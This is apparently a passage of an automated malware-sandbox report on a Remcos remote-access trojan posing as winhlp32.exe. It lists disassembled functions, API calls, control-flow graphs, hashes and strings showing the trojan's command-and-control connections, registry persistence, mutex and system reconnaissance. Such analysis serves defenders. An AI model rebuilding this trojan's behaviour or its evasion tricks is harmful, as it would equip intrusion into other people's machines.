                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\winhlp32.exe,00000104), ref: 0040E9EE
                                      • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                    • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\winhlp32.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                    • API String ID: 2830904901-3471202801
                                    • Opcode ID: 9dbae48a280d3333a9d77f8d0747098945c713f3f6b336d54fdc187ddd26b95e
                                    • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                    • Opcode Fuzzy Hash: 9dbae48a280d3333a9d77f8d0747098945c713f3f6b336d54fdc187ddd26b95e
                                    • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00414F2A Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 809sleepnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 448 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 461 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 448->461 462 414f74-414f7b Sleep 448->462 477 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->477 478 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->478 462->461 531 4150ec-4150f3 477->531 532 4150de-4150ea 477->532 478->477 533 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 531->533 532->533 560 4151d5-4151e3 call 40482d 533->560 561 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 533->561 567 415210-415225 call 404f51 call 4048c8 560->567 568 4151e5-41520b call 402093 * 2 call 41b4ef 560->568 583 415aa3-415ab5 call 404e26 call 4021fa 561->583 567->583 584 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 567->584 568->583 596 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 583->596 597 415add-415ae5 call 401e8d 583->597 648 415380-41538d call 405aa6 584->648 649 415392-4153b9 call 401fab call 4135a6 584->649 596->597 597->477 648->649 655 4153c0-415a0a call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 649->655 656 4153bb-4153bd 649->656 901 415a0f-415a16 655->901 656->655 902 415a18-415a1f 901->902 903 415a2a-415a31 901->903 902->903 904 415a21-415a23 902->904 905 415a33-415a38 call 40b051 903->905 906 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 903->906 904->903 905->906 917 415a71-415a7d CreateThread 906->917 918 415a83-415a9e call 401fd8 * 2 call 401f09 906->918 917->918 918->583
                                    APIs
                                    • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                    • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                    • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$ErrorLastLocalTime
                                    • String ID: | $%I64u$4.9.4 Pro$8SG$C:\Windows\winhlp32.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                    • API String ID: 524882891-2942873003
                                    • Opcode ID: 9db87f3de87cfa8e36bd2aa94494b67ad2d9ce1bdb307b710f7c67c5de9c73d7
                                    • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                    • Opcode Fuzzy Hash: 9db87f3de87cfa8e36bd2aa94494b67ad2d9ce1bdb307b710f7c67c5de9c73d7
                                    • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • connect.WS2_32(?,?,?), ref: 004048E0
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                    • WSAGetLastError.WS2_32 ref: 00404A21
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                    • API String ID: 994465650-2151626615
                                    • Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                    • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                    • Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                    • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1000 40da34-40da59 call 401f86 1003 40db83-40dba9 call 401f04 GetLongPathNameW call 40417e 1000->1003 1004 40da5f 1000->1004 1027 40dbae-40dc1b call 40417e call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1003->1027 1006 40da70-40da7e call 41b5b4 call 401f13 1004->1006 1007 40da91-40da96 1004->1007 1008 40db51-40db56 1004->1008 1009 40daa5-40daac call 41bfb7 1004->1009 1010 40da66-40da6b 1004->1010 1011 40db58-40db5d 1004->1011 1012 40da9b-40daa0 1004->1012 1013 40db6e 1004->1013 1014 40db5f-40db64 call 43c0cf 1004->1014 1031 40da83 1006->1031 1016 40db73-40db78 call 43c0cf 1007->1016 1008->1016 1028 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1009->1028 1029 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1009->1029 1010->1016 1011->1016 1012->1016 1013->1016 1024 40db69-40db6c 1014->1024 1030 40db79-40db7e call 409057 1016->1030 1024->1013 1024->1030 1028->1031 1036 40da87-40da8c call 401f09 1029->1036 1030->1003 1031->1036 1036->1003
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DB9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                    • API String ID: 82841172-425784914
                                    • Opcode ID: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                                    • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                    • Opcode Fuzzy Hash: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                                    • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1100 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1111 41b35d-41b366 1100->1111 1112 41b31c-41b32b call 4135a6 1100->1112 1114 41b368-41b36d 1111->1114 1115 41b36f 1111->1115 1117 41b330-41b347 call 401fab StrToIntA 1112->1117 1116 41b374-41b37f call 40537d 1114->1116 1115->1116 1122 41b355-41b358 call 401fd8 1117->1122 1123 41b349-41b352 call 41cf69 1117->1123 1122->1111 1123->1122
                                    APIs
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                      • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                      • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                      • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                    • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCurrentOpenProcessQueryValue
                                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                    • API String ID: 1866151309-2070987746
                                    • Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                    • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                    • Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                    • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CountEventTick
                                    • String ID: !D@$NG
                                    • API String ID: 180926312-2721294649
                                    • Opcode ID: 17288dea40e09c4a519d4d22f4c5c9f9b95757e2b0a4b77583ffa8c83c2e1810
                                    • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                    • Opcode Fuzzy Hash: 17288dea40e09c4a519d4d22f4c5c9f9b95757e2b0a4b77583ffa8c83c2e1810
                                    • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1282 41376f-413786 RegCreateKeyA 1283 413788-4137bd call 40247c call 401fab RegSetValueExA RegCloseKey 1282->1283 1284 4137bf 1282->1284 1286 4137c1-4137cf call 401fd8 1283->1286 1284->1286
                                    APIs
                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                    • RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
                                    • RegCloseKey.KERNELBASE(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: pth_unenc
                                    • API String ID: 1818849710-4028850238
                                    • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                    • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                    • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                    • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                    • CreateThread.KERNELBASE(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                    • FindCloseChangeNotification.KERNELBASE(?,?,00000000), ref: 00404DDB
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                    • String ID:
                                    • API String ID: 2579639479-0
                                    • Opcode ID: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                    • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                    • Opcode Fuzzy Hash: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                    • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1340 40d069-40d095 call 401fab CreateMutexA GetLastError
                                    APIs
                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                    • GetLastError.KERNEL32 ref: 0040D083
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateErrorLastMutex
                                    • String ID: SG
                                    • API String ID: 1925916568-3189917014
                                    • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                    • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                    • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                    • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                    • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EventObjectSingleWaitsend
                                    • String ID:
                                    • API String ID: 3963590051-0
                                    • Opcode ID: a00f43e109d8a5bcbea84027ff4f42fb49a7104e756b4714260ac134e081549c
                                    • Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
                                    • Opcode Fuzzy Hash: a00f43e109d8a5bcbea84027ff4f42fb49a7104e756b4714260ac134e081549c
                                    • Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1379 4135a6-4135d2 RegOpenKeyExA 1380 4135d4-4135fc RegQueryValueExA RegCloseKey 1379->1380 1381 413607 1379->1381 1382 413609 1380->1382 1383 4135fe-413605 1380->1383 1381->1382 1384 41360e-41361a call 402093 1382->1384 1383->1384
                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                    • RegCloseKey.KERNELBASE(?), ref: 004135F2
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 3677997916-0
                                    • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                    • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                    • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                    • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004136F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                    • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                    • RegCloseKey.KERNELBASE(00000000), ref: 00413738
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 3677997916-0
                                    • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                    • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                    • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                    • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00413569
                                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                    • RegCloseKey.KERNELBASE(?), ref: 00413592
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 3677997916-0
                                    • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                    • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                    • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                    • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                                    • RegCloseKey.KERNELBASE(?,?,?,0040C19C,00466C48), ref: 00413535
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 3677997916-0
                                    • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                    • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                    • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                    • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00413877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                    • RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                    • RegCloseKey.KERNELBASE(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID:
                                    • API String ID: 1818849710-0
                                    • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                    • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                    • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                    • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404B96 Relevance: 4.5, APIs: 3, Instructions: 28synchronizationnetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                    • recv.WS2_32(?,?,?,00000000), ref: 00404BDA
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EventObjectSingleWaitrecv
                                    • String ID:
                                    • API String ID: 311754179-0
                                    • Opcode ID: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                    • Instruction ID: 1d69a7fd2e689c68354a0251ffa64299bfe08f5f9c70e8df09ea9ad7bb005133
                                    • Opcode Fuzzy Hash: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                    • Instruction Fuzzy Hash: 00F08236108213FFD7059F10EC09E4AFB62FB84721F10862AF510522B08771FC21DBA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
